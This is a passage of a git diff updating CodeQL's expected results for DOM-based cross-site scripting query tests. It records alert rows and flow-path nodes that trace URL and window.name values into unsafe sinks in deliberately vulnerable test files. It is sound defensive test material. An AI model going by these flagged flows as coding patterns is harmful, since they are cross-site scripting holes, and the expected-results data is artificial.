tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:211:28:211:46 | this.props.tainted3 | tst.js:181:19:181:42 | documen ... .search | tst.js:211:28:211:46 | this.props.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:215:32:215:49 | prevProps.tainted4 | tst.js:181:19:181:42 | documen ... .search | tst.js:215:32:215:49 | prevProps.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:235:60:235:82 | this.st ... Tainted | tst.js:181:19:181:42 | documen ... .search | tst.js:235:60:235:82 | this.st ... Tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:243:7:243:17 | window.name | tst.js:243:7:243:17 | window.name | tst.js:243:7:243:17 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:243:7:243:17 | window.name | user-provided value | +| tst.js:244:7:244:10 | name | tst.js:244:7:244:10 | name | tst.js:244:7:244:10 | name | Cross-site scripting vulnerability due to $@. | tst.js:244:7:244:10 | name | user-provided value | +| tst.js:248:11:248:21 | window.name | tst.js:248:11:248:21 | window.name | tst.js:248:11:248:21 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:248:11:248:21 | window.name | user-provided value | +| tst.js:264:22:264:29 | location | tst.js:264:22:264:29 | location | tst.js:264:22:264:29 | location | Cross-site scripting vulnerability due to $@. | tst.js:264:22:264:29 | location | user-provided value | +| tst.js:272:59:272:65 | tainted | tst.js:269:19:269:29 | window.name | tst.js:272:59:272:65 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:269:19:269:29 | window.name | user-provided value | +| tst.js:287:20:287:20 | e | tst.js:285:9:285:16 | location | tst.js:287:20:287:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:285:9:285:16 | location | user-provided value | +| tst.js:295:20:295:20 | e | tst.js:292:10:292:17 | location | tst.js:295:20:295:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:292:10:292:17 | location | user-provided value | +| tst.js:300:35:300:42 | location | tst.js:300:35:300:42 | location | tst.js:300:35:300:42 | location | Cross-site scripting vulnerability due to $@. | tst.js:300:35:300:42 | location | user-provided value | +| tst.js:316:18:316:35 | params.get('name') | tst.js:311:18:311:34 | document.location | tst.js:316:18:316:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:311:18:311:34 | document.location | user-provided value | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | tst.js:325:20:325:36 | document.location | tst.js:327:5:327:30 | getUrl( ... ring(1) | Cross-site scripting vulnerability due to $@. | tst.js:325:20:325:36 | document.location | user-provided value | +| tst.js:333:12:333:17 | target | tst.js:332:16:332:39 | documen ... .search | tst.js:333:12:333:17 | target | Cross-site scripting vulnerability due to $@. | tst.js:332:16:332:39 | documen ... .search | user-provided value | +| tst.js:340:16:340:21 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:340:16:340:21 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:344:21:344:26 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:344:21:344:26 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:347:18:347:23 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:347:18:347:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:357:18:357:23 | target | tst.js:355:16:355:39 | documen ... .search | tst.js:357:18:357:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:16:355:39 | documen ... .search | user-provided value | +| tst.js:367:18:367:23 | target | tst.js:364:16:364:39 | documen ... .search | tst.js:367:18:367:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:369:18:369:29 | target.taint | tst.js:364:16:364:39 | documen ... .search | tst.js:369:18:369:29 | target.taint | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:375:18:375:30 | target.taint3 | tst.js:374:19:374:42 | documen ... .search | tst.js:375:18:375:30 | target.taint3 | Cross-site scripting vulnerability due to $@. | tst.js:374:19:374:42 | documen ... .search | user-provided value | +| tst.js:380:18:380:30 | target.taint5 | tst.js:364:16:364:39 | documen ... .search | tst.js:380:18:380:30 | target.taint5 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:389:18:389:30 | target.taint7 | tst.js:364:16:364:39 | documen ... .search | tst.js:389:18:389:30 | target.taint7 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:392:18:392:30 | target.taint8 | tst.js:364:16:364:39 | documen ... .search | tst.js:392:18:392:30 | target.taint8 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:400:18:400:24 | payload | tst.js:399:17:399:36 | window.location.hash | tst.js:400:18:400:24 | payload | Cross-site scripting vulnerability due to $@. | tst.js:399:17:399:36 | window.location.hash | user-provided value | +| tst.js:404:20:404:27 | match[1] | tst.js:402:15:402:34 | window.location.hash | tst.js:404:20:404:27 | match[1] | Cross-site scripting vulnerability due to $@. | tst.js:402:15:402:34 | window.location.hash | user-provided value | +| tst.js:407:18:407:51 | window. ... '#')[1] | tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:51 | window. ... '#')[1] | Cross-site scripting vulnerability due to $@. | tst.js:407:18:407:37 | window.location.hash | user-provided value | +| tst.js:413:18:413:89 | target. ... data>') | tst.js:411:16:411:39 | documen ... .search | tst.js:413:18:413:89 | target. ... data>') | Cross-site scripting vulnerability due to $@. | tst.js:411:16:411:39 | documen ... .search | user-provided value | +| tst.js:423:28:423:33 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:423:28:423:33 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:424:33:424:38 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:424:33:424:38 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:425:34:425:39 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:425:34:425:39 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:426:41:426:46 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:426:41:426:46 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:427:44:427:49 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:427:44:427:49 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:428:32:428:37 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:428:32:428:37 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:438:18:438:23 | source | tst.js:436:16:436:39 | documen ... .search | tst.js:438:18:438:23 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:16:436:39 | documen ... .search | user-provided value | +| tst.js:439:18:439:42 | ansiToH ... source) | tst.js:436:16:436:39 | documen ... .search | tst.js:439:18:439:42 | ansiToH ... source) | Cross-site scripting vulnerability due to $@. | tst.js:436:16:436:39 | documen ... .search | user-provided value | +| tst.js:446:21:446:26 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:446:21:446:26 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:448:19:448:24 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:448:19:448:24 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:450:20:450:25 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:450:20:450:25 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:456:19:456:21 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:456:19:456:21 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:457:26:457:28 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:457:26:457:28 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:458:25:458:27 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:458:25:458:27 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:459:20:459:22 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:459:20:459:22 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:469:22:469:24 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:469:22:469:24 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:474:23:474:45 | locatio ... bstr(1) | tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:474:23:474:35 | location.hash | user-provided value | +| tst.js:477:18:477:40 | locatio ... bstr(1) | tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:477:18:477:30 | location.hash | user-provided value | +| tst.js:484:33:484:63 | decodeU ... n.hash) | tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | tst.js:484:43:484:62 | window.location.hash | user-provided value | +| tst.js:492:18:492:54 | target. ... "), '') | tst.js:491:16:491:39 | documen ... .search | tst.js:492:18:492:54 | target. ... "), '') | Cross-site scripting vulnerability due to $@. | tst.js:491:16:491:39 | documen ... .search | user-provided value | | typeahead.js:25:18:25:20 | val | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:25:18:25:20 | val | Cross-site scripting vulnerability due to $@. | typeahead.js:20:22:20:45 | documen ... .search | user-provided value | | various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | | various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/XssWithAdditionalSources.expected b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/XssWithAdditionalSources.expected index 8e4fdb09b996..a9bc4f7c3a0b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/XssWithAdditionalSources.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/XssWithAdditionalSources.expected @@ -152,7 +152,7 @@ nodes | dragAndDrop.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | | event-handler-receiver.js:2:31:2:83 | '

    ' | semmle.label | '

    ' | | event-handler-receiver.js:2:49:2:61 | location.href | semmle.label | location.href | -| express.js:7:15:7:33 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:6:15:6:33 | req.param("wobble") | semmle.label | req.param("wobble") | | jquery.js:2:7:2:40 | tainted | semmle.label | tainted | | jquery.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | | jquery.js:4:5:4:11 | tainted | semmle.label | tainted | @@ -202,8 +202,8 @@ nodes | jwt-server.js:7:17:7:35 | req.param("wobble") | semmle.label | req.param("wobble") | | jwt-server.js:9:16:9:20 | taint | semmle.label | taint | | jwt-server.js:9:55:9:61 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:25 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:29 | decoded.foo | semmle.label | decoded.foo | +| jwt-server.js:10:19:10:25 | decoded | semmle.label | decoded | +| jwt-server.js:10:19:10:29 | decoded.foo | semmle.label | decoded.foo | | jwt.js:4:36:4:39 | data | semmle.label | data | | jwt.js:5:9:5:34 | decoded | semmle.label | decoded | | jwt.js:5:19:5:34 | jwt_decode(data) | semmle.label | jwt_decode(data) | @@ -348,9 +348,9 @@ nodes | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:9:27:9:38 | searchParams | semmle.label | searchParams | -| translate.js:9:27:9:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| translate.js:9:27:9:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | +| translate.js:8:27:8:38 | searchParams | semmle.label | searchParams | +| translate.js:8:27:8:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| translate.js:8:27:8:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | | trusted-types-lib.js:1:28:1:28 | x | semmle.label | x | | trusted-types-lib.js:2:12:2:12 | x | semmle.label | x | | trusted-types.js:3:62:3:62 | x | semmle.label | x | @@ -373,240 +373,240 @@ nodes | tst3.js:10:38:10:43 | data.p | semmle.label | data.p | | tst.js:2:7:2:39 | target | semmle.label | target | | tst.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:5:18:5:23 | target | semmle.label | target | -| tst.js:8:18:8:126 | "" | semmle.label | "" | -| tst.js:8:37:8:58 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:12:5:12:42 | '
    ' | semmle.label | '
    ' | -| tst.js:12:28:12:33 | target | semmle.label | target | -| tst.js:17:7:17:56 | params | semmle.label | params | -| tst.js:17:7:17:56 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | -| tst.js:17:16:17:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:17:25:17:41 | document.location | semmle.label | document.location | -| tst.js:18:18:18:23 | params | semmle.label | params | -| tst.js:18:18:18:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:18:18:18:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:20:7:20:61 | searchParams | semmle.label | searchParams | -| tst.js:20:7:20:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:20:22:20:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | -| tst.js:20:42:20:47 | target | semmle.label | target | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:21:18:21:29 | searchParams | semmle.label | searchParams | -| tst.js:21:18:21:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:21:18:21:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | -| tst.js:24:14:24:19 | target | semmle.label | target | -| tst.js:26:18:26:23 | target | semmle.label | target | -| tst.js:28:5:28:28 | documen ... .search | semmle.label | documen ... .search | -| tst.js:31:10:31:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:34:16:34:20 | bar() | semmle.label | bar() | -| tst.js:36:14:36:14 | x | semmle.label | x | -| tst.js:37:10:37:10 | x | semmle.label | x | -| tst.js:40:16:40:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | -| tst.js:40:20:40:43 | documen ... .search | semmle.label | documen ... .search | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:43:10:43:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:46:16:46:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:4:18:4:23 | target | semmle.label | target | +| tst.js:6:18:6:126 | "" | semmle.label | "" | +| tst.js:6:37:6:58 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:9:5:9:42 | '
    ' | semmle.label | '
    ' | +| tst.js:9:28:9:33 | target | semmle.label | target | +| tst.js:14:7:14:56 | params | semmle.label | params | +| tst.js:14:7:14:56 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | +| tst.js:14:16:14:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:14:25:14:41 | document.location | semmle.label | document.location | +| tst.js:15:18:15:23 | params | semmle.label | params | +| tst.js:15:18:15:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:15:18:15:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:17:7:17:61 | searchParams | semmle.label | searchParams | +| tst.js:17:7:17:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:17:22:17:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | +| tst.js:17:42:17:47 | target | semmle.label | target | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:18:18:18:29 | searchParams | semmle.label | searchParams | +| tst.js:18:18:18:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:18:18:18:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | +| tst.js:21:14:21:19 | target | semmle.label | target | +| tst.js:22:18:22:23 | target | semmle.label | target | +| tst.js:24:5:24:28 | documen ... .search | semmle.label | documen ... .search | +| tst.js:27:10:27:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:29:16:29:20 | bar() | semmle.label | bar() | +| tst.js:31:14:31:14 | x | semmle.label | x | +| tst.js:32:10:32:10 | x | semmle.label | x | +| tst.js:34:16:34:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | +| tst.js:34:20:34:43 | documen ... .search | semmle.label | documen ... .search | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:37:10:37:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:39:16:39:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:39:21:39:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:41:15:41:15 | s | semmle.label | s | +| tst.js:43:12:43:12 | s | semmle.label | s | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:46:16:46:45 | chop(do ... search) | semmle.label | chop(do ... search) | | tst.js:46:21:46:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:48:15:48:15 | s | semmle.label | s | -| tst.js:50:12:50:12 | s | semmle.label | s | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:54:16:54:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:56:16:56:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:58:16:58:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:26:58:30 | bar() | semmle.label | bar() | -| tst.js:60:34:60:34 | s | semmle.label | s | -| tst.js:62:18:62:18 | s | semmle.label | s | -| tst.js:64:25:64:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:65:25:65:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:68:16:68:20 | bar() | semmle.label | bar() | -| tst.js:70:1:70:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | -| tst.js:70:3:70:26 | documen ... .search | semmle.label | documen ... .search | -| tst.js:70:46:70:46 | x | semmle.label | x | -| tst.js:73:20:73:20 | x | semmle.label | x | -| tst.js:77:49:77:72 | documen ... .search | semmle.label | documen ... .search | -| tst.js:81:26:81:49 | documen ... .search | semmle.label | documen ... .search | -| tst.js:82:25:82:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:84:33:84:56 | documen ... .search | semmle.label | documen ... .search | -| tst.js:85:32:85:55 | documen ... .search | semmle.label | documen ... .search | -| tst.js:90:39:90:62 | documen ... .search | semmle.label | documen ... .search | -| tst.js:96:30:96:53 | documen ... .search | semmle.label | documen ... .search | -| tst.js:102:25:102:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:7:107:44 | v | semmle.label | v | -| tst.js:107:11:107:34 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:11:107:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:110:18:110:18 | v | semmle.label | v | -| tst.js:136:18:136:18 | v | semmle.label | v | -| tst.js:148:29:148:50 | window. ... .search | semmle.label | window. ... .search | -| tst.js:151:29:151:29 | v | semmle.label | v | -| tst.js:151:49:151:49 | v | semmle.label | v | -| tst.js:155:29:155:46 | xssSourceService() | semmle.label | xssSourceService() | -| tst.js:158:40:158:61 | window. ... .search | semmle.label | window. ... .search | -| tst.js:177:9:177:41 | target | semmle.label | target | -| tst.js:177:18:177:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:180:28:180:33 | target | semmle.label | target | -| tst.js:184:9:184:42 | tainted | semmle.label | tainted | -| tst.js:184:19:184:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:186:31:186:37 | tainted | semmle.label | tainted | -| tst.js:188:42:188:48 | tainted | semmle.label | tainted | -| tst.js:189:33:189:39 | tainted | semmle.label | tainted | -| tst.js:191:54:191:60 | tainted | semmle.label | tainted | -| tst.js:192:45:192:51 | tainted | semmle.label | tainted | -| tst.js:193:49:193:55 | tainted | semmle.label | tainted | -| tst.js:197:9:197:42 | tainted | semmle.label | tainted | -| tst.js:197:19:197:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:199:67:199:73 | tainted | semmle.label | tainted | -| tst.js:200:67:200:73 | tainted | semmle.label | tainted | -| tst.js:204:35:204:41 | tainted | semmle.label | tainted | -| tst.js:206:46:206:52 | tainted | semmle.label | tainted | -| tst.js:207:38:207:44 | tainted | semmle.label | tainted | -| tst.js:208:35:208:41 | tainted | semmle.label | tainted | -| tst.js:212:28:212:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | -| tst.js:213:28:213:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | -| tst.js:214:28:214:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | -| tst.js:218:32:218:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | -| tst.js:225:28:225:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | -| tst.js:226:28:226:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | -| tst.js:227:28:227:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | -| tst.js:231:32:231:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | -| tst.js:236:35:236:41 | tainted | semmle.label | tainted | -| tst.js:238:20:238:26 | tainted | semmle.label | tainted | -| tst.js:240:23:240:29 | tainted | semmle.label | tainted | -| tst.js:241:23:241:29 | tainted | semmle.label | tainted | -| tst.js:247:39:247:55 | props.propTainted | semmle.label | props.propTainted | -| tst.js:251:60:251:82 | this.st ... Tainted | semmle.label | this.st ... Tainted | -| tst.js:255:23:255:29 | tainted | semmle.label | tainted | -| tst.js:259:7:259:17 | window.name | semmle.label | window.name | -| tst.js:260:7:260:10 | name | semmle.label | name | -| tst.js:264:11:264:21 | window.name | semmle.label | window.name | -| tst.js:280:22:280:29 | location | semmle.label | location | -| tst.js:285:9:285:29 | tainted | semmle.label | tainted | -| tst.js:285:19:285:29 | window.name | semmle.label | window.name | -| tst.js:288:59:288:65 | tainted | semmle.label | tainted | -| tst.js:301:9:301:16 | location | semmle.label | location | -| tst.js:302:10:302:10 | e | semmle.label | e | -| tst.js:303:20:303:20 | e | semmle.label | e | -| tst.js:308:10:308:17 | location | semmle.label | location | -| tst.js:310:10:310:10 | e | semmle.label | e | -| tst.js:311:20:311:20 | e | semmle.label | e | -| tst.js:316:35:316:42 | location | semmle.label | location | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:327:18:327:34 | document.location | semmle.label | document.location | -| tst.js:331:7:331:43 | params | semmle.label | params | -| tst.js:331:7:331:43 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | -| tst.js:331:16:331:43 | getTain ... hParams | semmle.label | getTain ... hParams | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... hParams [MapValue] | -| tst.js:332:18:332:23 | params | semmle.label | params | -| tst.js:332:18:332:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:332:18:332:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | -| tst.js:341:20:341:36 | document.location | semmle.label | document.location | -| tst.js:343:5:343:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | -| tst.js:343:5:343:17 | getUrl().hash | semmle.label | getUrl().hash | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | -| tst.js:348:7:348:39 | target | semmle.label | target | -| tst.js:348:16:348:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:349:12:349:17 | target | semmle.label | target | -| tst.js:355:10:355:42 | target | semmle.label | target | -| tst.js:355:19:355:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:356:16:356:21 | target | semmle.label | target | -| tst.js:357:20:357:25 | target | semmle.label | target | -| tst.js:360:21:360:26 | target | semmle.label | target | -| tst.js:363:18:363:23 | target | semmle.label | target | -| tst.js:371:7:371:39 | target | semmle.label | target | -| tst.js:371:16:371:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:374:18:374:23 | target | semmle.label | target | -| tst.js:381:7:381:39 | target | semmle.label | target | -| tst.js:381:16:381:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:384:18:384:23 | target | semmle.label | target | -| tst.js:386:18:386:23 | target | semmle.label | target | -| tst.js:386:18:386:29 | target.taint | semmle.label | target.taint | -| tst.js:391:3:391:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | -| tst.js:391:19:391:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:392:18:392:23 | target [taint3] | semmle.label | target [taint3] | -| tst.js:392:18:392:30 | target.taint3 | semmle.label | target.taint3 | -| tst.js:397:18:397:23 | target | semmle.label | target | -| tst.js:397:18:397:30 | target.taint5 | semmle.label | target.taint5 | -| tst.js:406:18:406:23 | target | semmle.label | target | -| tst.js:406:18:406:30 | target.taint7 | semmle.label | target.taint7 | -| tst.js:408:3:408:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | -| tst.js:408:19:408:24 | 